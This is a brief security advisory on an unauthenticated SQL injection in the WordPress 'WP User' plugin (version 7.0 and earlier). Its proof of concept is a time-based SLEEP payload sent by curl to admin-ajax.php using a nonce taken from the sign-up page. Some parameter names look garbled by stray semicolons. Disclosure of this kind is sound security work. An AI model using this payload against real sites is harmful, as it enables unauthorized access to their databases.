WP User <= 7.0 - Unauthenticated SQLi

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.

PoC

1. As an unauthenticated user, visit the “Sign Up” page (by default, this is /?page_id=5, or /user/) 2. Extract the “wpuser_update_setting” nonce (CTRL+F for “wpuser_update_setting”) 3. Invoke the following curl command, with the just extracted nonce, to induce a 5 seconds sleep: time curl https://example.com/wp-admin/admin-ajax.php \ --data ‘action=wpuser_group_action&group;_action=x&wpuser;_update_setting=&id;=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))khkM)’